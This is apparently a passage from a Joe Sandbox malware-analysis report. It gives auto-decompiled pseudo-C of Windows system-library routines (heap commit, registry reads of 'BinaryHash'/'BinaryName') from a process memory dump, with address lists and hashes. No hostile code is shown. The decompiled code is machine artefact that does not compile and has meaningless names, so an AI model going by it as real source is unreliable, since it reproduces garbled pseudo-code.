                                  				char _v24;
                                  				intOrPtr _v28;
                                  				unsigned int _v32;
                                  				signed int _v36;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				intOrPtr _v64;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int _t58;
                                  				unsigned int _t60;
                                  				intOrPtr _t62;
                                  				char* _t67;
                                  				char* _t69;
                                  				void* _t80;
                                  				void* _t83;
                                  				intOrPtr _t93;
                                  				intOrPtr _t115;
                                  				char _t117;
                                  				void* _t120;
                                  
                                  				_t83 = __edx;
                                  				_t117 = 0;
                                  				_t120 = __ecx;
                                  				_v44 = 0;
                                  				if(E034EFF69(__ecx,  &_v44,  &_v32) < 0) {
                                  					L24:
                                  					_t109 = _v44;
                                  					if(_v44 != 0) {
                                  						E034F1074(_t83, _t120, _t109, _t117, _t117);
                                  					}
                                  					L26:
                                  					return _t117;
                                  				}
                                  				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                  				_t5 = _t83 + 1; // 0x1
                                  				_v36 = _t5 << 0xc;
                                  				_v40 = _t93;
                                  				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                  				asm("sbb ebx, ebx");
                                  				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                  				if(_t58 != 0) {
                                  					_push(0);
                                  					_push(0x14);
                                  					_push( &_v24);
                                  					_push(3);
                                  					_push(_t93);
                                  					_push(0xffffffff);
                                  					_t80 = E03469730();
                                  					_t115 = _v64;
                                  					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                  						_push(_t93);
                                  						E034EA80D(_t115, 1, _v20, _t117);
                                  						_t83 = 4;
                                  					}
                                  				}
                                  				if(E034EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                  					goto L24;
                                  				}
                                  				_t60 = _v32;
                                  				_t97 = (_t60 != 0x100000) + 1;
                                  				_t83 = (_v44 -  *0x3518b04 >> 0x14) + (_v44 -  *0x3518b04 >> 0x14);
                                  				_v28 = (_t60 != 0x100000) + 1;
                                  				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                  				_v40 = _t62;
                                  				if(_t83 >= _t62) {
                                  					L10:
                                  					asm("lock xadd [eax], ecx");
                                  					asm("lock xadd [eax], ecx");
                                  					if(E03447D50() == 0) {
                                  						_t67 = 0x7ffe0380;
                                  					} else {
                                  						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  					}
                                  					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                  						E034E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                  					}
                                  					if(E03447D50() == 0) {
                                  						_t69 = 0x7ffe0388;
                                  					} else {
                                  						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  					}
                                  					if( *_t69 != 0) {
                                  						E034DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                  					}
                                  					if(( *0x3518724 & 0x00000008) != 0) {
                                  						E034E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                  					}
                                  					_t117 = _v44;
                                  					goto L26;
                                  				}
                                  				while(E034F15B5(0x3518ae4, _t83, _t97, _t97) >= 0) {
                                  					_t97 = _v28;
                                  					_t83 = _t83 + 2;
                                  					if(_t83 < _v40) {
                                  						continue;
                                  					}
                                  					goto L10;
                                  				}
                                  				goto L24;
                                  			}
























                                  0x034f0eb7
                                  0x034f0eb9
                                  0x034f0ec0
                                  0x034f0ec2
                                  0x034f0ecd
                                  0x034f105b
                                  0x034f105b
                                  0x034f1061
                                  0x034f1066
                                  0x034f1066
                                  0x034f106b
                                  0x034f1073
                                  0x034f1073
                                  0x034f0ed3
                                  0x034f0ed6
                                  0x034f0edc
                                  0x034f0ee0
                                  0x034f0ee7
                                  0x034f0ef0
                                  0x034f0ef5
                                  0x034f0efa
                                  0x034f0efc
                                  0x034f0efd
                                  0x034f0f03
                                  0x034f0f04
                                  0x034f0f06
                                  0x034f0f07
                                  0x034f0f09
                                  0x034f0f0e
                                  0x034f0f14
                                  0x034f0f23
                                  0x034f0f2d
                                  0x034f0f34
                                  0x034f0f34
                                  0x034f0f14
                                  0x034f0f52
                                  0x00000000
                                  0x00000000
                                  0x034f0f58
                                  0x034f0f73
                                  0x034f0f74
                                  0x034f0f79
                                  0x034f0f7d
                                  0x034f0f80
                                  0x034f0f86
                                  0x034f0fab
                                  0x034f0fb5
                                  0x034f0fc6
                                  0x034f0fd1
                                  0x034f0fe3
                                  0x034f0fd3
                                  0x034f0fdc
                                  0x034f0fdc
                                  0x034f0feb
                                  0x034f1009
                                  0x034f1009
                                  0x034f1015
                                  0x034f1027
                                  0x034f1017
                                  0x034f1020
                                  0x034f1020
                                  0x034f102f
                                  0x034f103c
                                  0x034f103c
                                  0x034f1048
                                  0x034f1050
                                  0x034f1050
                                  0x034f1055
                                  0x00000000
                                  0x034f1055
                                  0x034f0f88
                                  0x034f0f9e
                                  0x034f0fa2
                                  0x034f0fa9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f0fa9
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: fb34bfdf0aa311ca66140d100bf1d92726745aef7a0d8b418fbffa6f1078ef55
                                  • Instruction ID: 95577dd0e90496431281b561300b82e76e664e518d9630abbe965ba79646816e
                                  • Opcode Fuzzy Hash: fb34bfdf0aa311ca66140d100bf1d92726745aef7a0d8b418fbffa6f1078ef55
                                  • Instruction Fuzzy Hash: E751AF712043419FD324DF2AD980B1BB7E5EBC4704F08092EFA969F691D771E806CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0345F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				char* _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				char _v44;
                                  				char _v52;
                                  				intOrPtr _v56;
                                  				char _v60;
                                  				intOrPtr _v72;
                                  				void* _t51;
                                  				void* _t58;
                                  				signed short _t82;
                                  				short _t84;
                                  				signed int _t91;
                                  				signed int _t100;
                                  				signed short* _t103;
                                  				void* _t108;
                                  				intOrPtr* _t109;
                                  
                                  				_t103 = __ecx;
                                  				_t82 = __edx;
                                  				_t51 = E03444120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                  				if(_t51 >= 0) {
                                  					_push(0x21);
                                  					_push(3);
                                  					_v56 =  *0x7ffe02dc;
                                  					_v20 =  &_v52;
                                  					_push( &_v44);
                                  					_v28 = 0x18;
                                  					_push( &_v28);
                                  					_push(0x100020);
                                  					_v24 = 0;
                                  					_push( &_v60);
                                  					_v16 = 0x40;
                                  					_v12 = 0;
                                  					_v8 = 0;
                                  					_t58 = E03469830();
                                  					_t87 =  *[fs:0x30];
                                  					_t108 = _t58;
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                  					if(_t108 < 0) {
                                  						L11:
                                  						_t51 = _t108;
                                  					} else {
                                  						_push(4);
                                  						_push(8);
                                  						_push( &_v36);
                                  						_push( &_v44);
                                  						_push(_v60);
                                  						_t108 = E03469990();
                                  						if(_t108 < 0) {
                                  							L10:
                                  							_push(_v60);
                                  							E034695D0();
                                  							goto L11;
                                  						} else {
                                  							_t109 = L03444620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                  							if(_t109 == 0) {
                                  								_t108 = 0xc0000017;
                                  								goto L10;
                                  							} else {
                                  								_t21 = _t109 + 0x18; // 0x18
                                  								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                  								 *_t109 = 1;
                                  								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                  								 *(_t109 + 0xe) = _t82;
                                  								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                  								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                  								E0346F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                  								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                  								 *((short*)(_t109 + 0xc)) =  *_t103;
                                  								_t91 =  *_t103 & 0x0000ffff;
                                  								_t100 = _t91 & 0xfffffffe;
                                  								_t84 = 0x5c;
                                  								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                  									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                  										_push(_v60);
                                  										E034695D0();
                                  										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                  										_t51 = 0xc0000106;
                                  									} else {
                                  										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                  										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                  										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                  										goto L5;
                                  									}
                                  								} else {
                                  									L5:
                                  									 *_a4 = _t109;
                                  									_t51 = 0;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t51;
                                  			}

























                                  0x0345f0d3
                                  0x0345f0d9
                                  0x0345f0e0
                                  0x0345f0e7
                                  0x0345f0f2
                                  0x0345f0f4
                                  0x0345f0f8
                                  0x0345f100
                                  0x0345f108
                                  0x0345f10d
                                  0x0345f115
                                  0x0345f116
                                  0x0345f11f
                                  0x0345f123
                                  0x0345f124
                                  0x0345f12c
                                  0x0345f130
                                  0x0345f134
                                  0x0345f13d
                                  0x0345f144
                                  0x0345f14b
                                  0x0345f152
                                  0x0349bab0
                                  0x0349bab0
                                  0x0345f158
                                  0x0345f158
                                  0x0345f15a
                                  0x0345f160
                                  0x0345f165
                                  0x0345f166
                                  0x0345f16f
                                  0x0345f173
                                  0x0349baa7
                                  0x0349baa7
                                  0x0349baab
                                  0x00000000
                                  0x0345f179
                                  0x0345f18d
                                  0x0345f191
                                  0x0349baa2
                                  0x00000000
                                  0x0345f197
                                  0x0345f19b
                                  0x0345f1a2
                                  0x0345f1a9
                                  0x0345f1af
                                  0x0345f1b2
                                  0x0345f1b6
                                  0x0345f1b9
                                  0x0345f1c4
                                  0x0345f1d8
                                  0x0345f1df
                                  0x0345f1e3
                                  0x0345f1eb
                                  0x0345f1ee
                                  0x0345f1f4
                                  0x0345f20f
                                  0x0349bab7
                                  0x0349babb
                                  0x0349bacc
                                  0x0349bad1
                                  0x0345f215
                                  0x0345f218
                                  0x0345f226
                                  0x0345f22b
                                  0x00000000
                                  0x0345f22b
                                  0x0345f1f6
                                  0x0345f1f6
                                  0x0345f1f9
                                  0x0345f1fb
                                  0x0345f1fb
                                  0x0345f1f4
                                  0x0345f191
                                  0x0345f173
                                  0x0345f152
                                  0x0345f203

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction ID: 8bfd77ec182f2dcea7f9116d76bc98e18409498d9887a8526976b2f900924500
                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                  • Instruction Fuzzy Hash: 50518D755047109FD320DF19C840A6BBBF8FF48710F00892EF9A59B690E7B4E904CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E034A3540(intOrPtr _a4) {
                                  				signed int _v12;
                                  				intOrPtr _v88;
                                  				intOrPtr _v92;
                                  				char _v96;
                                  				char _v352;
                                  				char _v1072;
                                  				intOrPtr _v1140;
                                  				intOrPtr _v1148;
                                  				char _v1152;
                                  				char _v1156;
                                  				char _v1160;
                                  				char _v1164;
                                  				char _v1168;
                                  				char* _v1172;
                                  				short _v1174;
                                  				char _v1176;
                                  				char _v1180;
                                  				char _v1192;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				short _t41;
                                  				short _t42;
                                  				intOrPtr _t80;
                                  				intOrPtr _t81;
                                  				signed int _t82;
                                  				void* _t83;
                                  
                                  				_v12 =  *0x351d360 ^ _t82;
                                  				_t41 = 0x14;
                                  				_v1176 = _t41;
                                  				_t42 = 0x16;
                                  				_v1174 = _t42;
                                  				_v1164 = 0x100;
                                  				_v1172 = L"BinaryHash";
                                  				_t81 = E03460BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                  				if(_t81 < 0) {
                                  					L11:
                                  					_t75 = _t81;
                                  					E034A3706(0, _t81, _t79, _t80);
                                  					L12:
                                  					if(_a4 != 0xc000047f) {
                                  						E0346FA60( &_v1152, 0, 0x50);
                                  						_v1152 = 0x60c201e;
                                  						_v1148 = 1;
                                  						_v1140 = E034A3540;
                                  						E0346FA60( &_v1072, 0, 0x2cc);
                                  						_push( &_v1072);
                                  						E0347DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                  						E034B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                  						_push(_v1152);
                                  						_push(0xffffffff);
                                  						E034697C0();
                                  					}
                                  					return E0346B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                  				}
                                  				_t79 =  &_v352;
                                  				_t81 = E034A3971(0, _a4,  &_v352,  &_v1156);
                                  				if(_t81 < 0) {
                                  					goto L11;
                                  				}
                                  				_t75 = _v1156;
                                  				_t79 =  &_v1160;
                                  				_t81 = E034A3884(_v1156,  &_v1160,  &_v1168);
                                  				if(_t81 >= 0) {
                                  					_t80 = _v1160;
                                  					E0346FA60( &_v96, 0, 0x50);
                                  					_t83 = _t83 + 0xc;
                                  					_push( &_v1180);
                                  					_push(0x50);
                                  					_push( &_v96);
                                  					_push(2);
                                  					_push( &_v1176);
                                  					_push(_v1156);
                                  					_t81 = E03469650();
                                  					if(_t81 >= 0) {
                                  						if(_v92 != 3 || _v88 == 0) {
                                  							_t81 = 0xc000090b;
                                  						}
                                  						if(_t81 >= 0) {
                                  							_t75 = _a4;
                                  							_t79 =  &_v352;
                                  							E034A3787(_a4,  &_v352, _t80);
                                  						}
                                  					}
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                  				}
                                  				_push(_v1156);
                                  				E034695D0();
                                  				if(_t81 >= 0) {
                                  					goto L12;
                                  				} else {
                                  					goto L11;
                                  				}
                                  			}































                                  0x034a3552
                                  0x034a355a
                                  0x034a355d
                                  0x034a3566
                                  0x034a3567
                                  0x034a357e
                                  0x034a358f
                                  0x034a35a1
                                  0x034a35a5
                                  0x034a366b
                                  0x034a366b
                                  0x034a366d
                                  0x034a3672
                                  0x034a3679
                                  0x034a3685
                                  0x034a368d
                                  0x034a369d
                                  0x034a36a7
                                  0x034a36b8
                                  0x034a36c6
                                  0x034a36c7
                                  0x034a36dc
                                  0x034a36e1
                                  0x034a36e7
                                  0x034a36e9
                                  0x034a36e9
                                  0x034a3703
                                  0x034a3703
                                  0x034a35b5
                                  0x034a35c0
                                  0x034a35c4
                                  0x00000000
                                  0x00000000
                                  0x034a35ca
                                  0x034a35d7
                                  0x034a35e2
                                  0x034a35e6
                                  0x034a35e8
                                  0x034a35f5
                                  0x034a35fa
                                  0x034a3603
                                  0x034a3604
                                  0x034a3609
                                  0x034a360a
                                  0x034a3612
                                  0x034a3613
                                  0x034a361e
                                  0x034a3622
                                  0x034a3628
                                  0x034a362f
                                  0x034a362f
                                  0x034a3636
                                  0x034a3638
                                  0x034a363b
                                  0x034a3642
                                  0x034a3642
                                  0x034a3636
                                  0x034a3657
                                  0x034a3657
                                  0x034a365c
                                  0x034a3662
                                  0x034a3669
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: adc2840ceb1d1260690d4608d2730c7888e5e6fcaa0d41a40bd4aa6a265250aa
                                  • Instruction ID: af74c36c8905a3188fcedbfa540fbafc4e9fb2e395129f35c8ab682422da2703
                                  • Opcode Fuzzy Hash: adc2840ceb1d1260690d4608d2730c7888e5e6fcaa0d41a40bd4aa6a265250aa
                                  • Instruction Fuzzy Hash: CD4134B5D0062C9FDB61DE55CC80FDEB77CAB54714F0045AAE609AF250EB309E888F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E034F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                  				signed int _v20;
                                  				char _v24;
                                  				signed int _v28;
                                  				char _v32;
                                  				signed int _v36;
                                  				intOrPtr _v40;
                                  				void* __ebx;
                                  				void* _t35;
                                  				signed int _t42;
                                  				char* _t48;
                                  				signed int _t59;
                                  				signed char _t61;
                                  				signed int* _t79;
                                  				void* _t88;
                                  
                                  				_v28 = __edx;
                                  				_t79 = __ecx;
                                  				if(E034F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                  					L13:
                                  					_t35 = 0;
                                  					L14:
                                  					return _t35;
                                  				}
                                  				_t61 = __ecx[1];
                                  				_t59 = __ecx[0xf];
                                  				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                  				_v36 = _a8 << 0xc;
                                  				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                  				asm("sbb esi, esi");
                                  				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                  				if(_t42 != 0) {
                                  					_push(0);
                                  					_push(0x14);
                                  					_push( &_v24);
                                  					_push(3);
                                  					_push(_t59);
                                  					_push(0xffffffff);
                                  					if(E03469730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                  						_push(_t61);
                                  						E034EA80D(_t59, 1, _v20, 0);
                                  						_t88 = 4;
                                  					}
                                  				}
                                  				_t35 = E034EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                  				if(_t35 < 0) {
                                  					goto L14;
                                  				}
                                  				E034F1293(_t79, _v40, E034F07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                  				if(E03447D50() == 0) {
                                  					_t48 = 0x7ffe0380;
                                  				} else {
                                  					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  				}
                                  				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                  					E034E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                  				}
                                  				goto L13;
                                  			}

















                                  0x034f05c5
                                  0x034f05ca
                                  0x034f05d3
                                  0x034f06db
                                  0x034f06db
                                  0x034f06dd
                                  0x034f06e3
                                  0x034f06e3
                                  0x034f05dd
                                  0x034f05e7
                                  0x034f05f6
                                  0x034f0600
                                  0x034f0607
                                  0x034f0610
                                  0x034f0615
                                  0x034f061a
                                  0x034f061c
                                  0x034f061e
                                  0x034f0624
                                  0x034f0625
                                  0x034f0627
                                  0x034f0628
                                  0x034f0631
                                  0x034f0640
                                  0x034f064d
                                  0x034f0654
                                  0x034f0654
                                  0x034f0631
                                  0x034f066d
                                  0x034f0674
                                  0x00000000
                                  0x00000000
                                  0x034f0692
                                  0x034f069e
                                  0x034f06b0
                                  0x034f06a0
                                  0x034f06a9
                                  0x034f06a9
                                  0x034f06b8
                                  0x034f06d6
                                  0x034f06d6
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction ID: c7bd458053570acda583ff3b13b5a5b7bdf9dc5c9770bea4e20aee6db6596a8c
                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction Fuzzy Hash: C031E032600345AFE720DE25CC84F9BBBD9ABC4754F08422AFA589F291D770E904CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E034A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				char* _v20;
                                  				short _v22;
                                  				char _v24;
                                  				intOrPtr _t38;
                                  				short _t40;
                                  				short _t41;
                                  				void* _t44;
                                  				intOrPtr _t47;
                                  				void* _t48;
                                  
                                  				_v16 = __edx;
                                  				_t40 = 0x14;
                                  				_v24 = _t40;
                                  				_t41 = 0x16;
                                  				_v22 = _t41;
                                  				_t38 = 0;
                                  				_v12 = __ecx;
                                  				_push( &_v8);
                                  				_push(0);
                                  				_push(0);
                                  				_push(2);
                                  				_t43 =  &_v24;
                                  				_v20 = L"BinaryName";
                                  				_push( &_v24);
                                  				_push(__ecx);
                                  				_t47 = 0;
                                  				_t48 = E03469650();
                                  				if(_t48 >= 0) {
                                  					_t48 = 0xc000090b;
                                  				}
                                  				if(_t48 != 0xc0000023) {
                                  					_t44 = 0;
                                  					L13:
                                  					if(_t48 < 0) {
                                  						L16:
                                  						if(_t47 != 0) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                  						}
                                  						L18:
                                  						return _t48;
                                  					}
                                  					 *_v16 = _t38;
                                  					 *_a4 = _t47;
                                  					goto L18;
                                  				}
                                  				_t47 = L03444620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                  				if(_t47 != 0) {
                                  					_push( &_v8);
                                  					_push(_v8);
                                  					_push(_t47);
                                  					_push(2);
                                  					_push( &_v24);
                                  					_push(_v12);
                                  					_t48 = E03469650();
                                  					if(_t48 < 0) {
                                  						_t44 = 0;
                                  						goto L16;
                                  					}
                                  					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                  						_t48 = 0xc000090b;
                                  					}
                                  					_t44 = 0;
                                  					if(_t48 < 0) {
                                  						goto L16;
                                  					} else {
                                  						_t17 = _t47 + 0xc; // 0xc
                                  						_t38 = _t17;
                                  						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                  							_t48 = 0xc000090b;
                                  						}
                                  						goto L13;
                                  					}
                                  				}
                                  				_t48 = _t48 + 0xfffffff4;
                                  				goto L18;
                                  			}















                                  0x034a3893
                                  0x034a3896
                                  0x034a3899
                                  0x034a389f
                                  0x034a38a0
                                  0x034a38a4
                                  0x034a38a9
                                  0x034a38ac
                                  0x034a38ad
                                  0x034a38ae
                                  0x034a38af
                                  0x034a38b1
                                  0x034a38b4
                                  0x034a38bb
                                  0x034a38bc
                                  0x034a38bd
                                  0x034a38c4
                                  0x034a38c8
                                  0x034a38ca
                                  0x034a38ca
                                  0x034a38d5
                                  0x034a393e
                                  0x034a3940
                                  0x034a3942
                                  0x034a3952
                                  0x034a3954
                                  0x034a3961
                                  0x034a3961
                                  0x034a3967
                                  0x034a396e
                                  0x034a396e
                                  0x034a3947
                                  0x034a394c
                                  0x00000000
                                  0x034a394c
                                  0x034a38ea
                                  0x034a38ee
                                  0x034a38f8
                                  0x034a38f9
                                  0x034a38ff
                                  0x034a3900
                                  0x034a3902
                                  0x034a3903
                                  0x034a390b
                                  0x034a390f
                                  0x034a3950
                                  0x00000000
                                  0x034a3950
                                  0x034a3915
                                  0x034a391d
                                  0x034a391d
                                  0x034a3922
                                  0x034a3926
                                  0x00000000
                                  0x034a3928
                                  0x034a392b
                                  0x034a392b
                                  0x034a3935
                                  0x034a3937
                                  0x034a3937
                                  0x00000000
                                  0x034a3935
                                  0x034a3926
                                  0x034a38f0
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: c3ba5eee06ea6cea393076a42949df34670db88a7289951396a6b94f2bfe5250
                                  • Instruction ID: 2809d1b8c532bf47260d6528591e4f30ee8968c967f985ff4d76f2199866fe44
                                  • Opcode Fuzzy Hash: c3ba5eee06ea6cea393076a42949df34670db88a7289951396a6b94f2bfe5250
                                  • Instruction Fuzzy Hash: CE31053AD04A19AFDB15DE5DC945E6BF778EB90B20F01416AE914AF390E7309E04CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E0345D294(void* __ecx, char __edx, void* __eflags) {
                                  				signed int _v8;
                                  				char _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				intOrPtr _v64;
                                  				char* _v68;
                                  				intOrPtr _v72;
                                  				char _v76;
                                  				signed int _v84;
                                  				intOrPtr _v88;
                                  				char _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				char _v105;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t35;
                                  				char _t38;
                                  				signed int _t40;
                                  				signed int _t44;
                                  				signed int _t52;
                                  				void* _t53;
                                  				void* _t55;
                                  				void* _t61;
                                  				intOrPtr _t62;
                                  				void* _t64;
                                  				signed int _t65;
                                  				signed int _t66;
                                  
                                  				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                  				_v8 =  *0x351d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                  				_v105 = __edx;
                                  				_push( &_v92);
                                  				_t52 = 0;
                                  				_push(0);
                                  				_push(0);
                                  				_push( &_v104);
                                  				_push(0);
                                  				_t59 = __ecx;
                                  				_t55 = 2;
                                  				if(E03444120(_t55, __ecx) < 0) {
                                  					_t35 = 0;
                                  					L8:
                                  					_pop(_t61);
                                  					_pop(_t64);
                                  					_pop(_t53);
                                  					return E0346B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                  				}
                                  				_v96 = _v100;
                                  				_t38 = _v92;
                                  				if(_t38 != 0) {
                                  					_v104 = _t38;
                                  					_v100 = _v88;
                                  					_t40 = _v84;
                                  				} else {
                                  					_t40 = 0;
                                  				}
                                  				_v72 = _t40;
                                  				_v68 =  &_v104;
                                  				_push( &_v52);
                                  				_v76 = 0x18;
                                  				_push( &_v76);
                                  				_v64 = 0x40;
                                  				_v60 = _t52;
                                  				_v56 = _t52;
                                  				_t44 = E034698D0();
                                  				_t62 = _v88;
                                  				_t65 = _t44;
                                  				if(_t62 != 0) {
                                  					asm("lock xadd [edi], eax");
                                  					if((_t44 | 0xffffffff) != 0) {
                                  						goto L4;
                                  					}
                                  					_push( *((intOrPtr*)(_t62 + 4)));
                                  					E034695D0();
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                  					goto L4;
                                  				} else {
                                  					L4:
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                  					if(_t65 >= 0) {
                                  						_t52 = 1;
                                  					} else {
                                  						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                  							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                  						}
                                  					}
                                  					_t35 = _t52;
                                  					goto L8;
                                  				}
                                  			}

































                                  0x0345d29c
                                  0x0345d2a6
                                  0x0345d2b1
                                  0x0345d2b5
                                  0x0345d2b6
                                  0x0345d2bc
                                  0x0345d2bd
                                  0x0345d2be
                                  0x0345d2bf
                                  0x0345d2c2
                                  0x0345d2c4
                                  0x0345d2cc
                                  0x0345d384
                                  0x0345d34b
                                  0x0345d34f
                                  0x0345d350
                                  0x0345d351
                                  0x0345d35c
                                  0x0345d35c
                                  0x0345d2d6
                                  0x0345d2da
                                  0x0345d2e1
                                  0x0345d361
                                  0x0345d369
                                  0x0345d36d
                                  0x0345d2e3
                                  0x0345d2e3
                                  0x0345d2e3
                                  0x0345d2e5
                                  0x0345d2ed
                                  0x0345d2f5
                                  0x0345d2fa
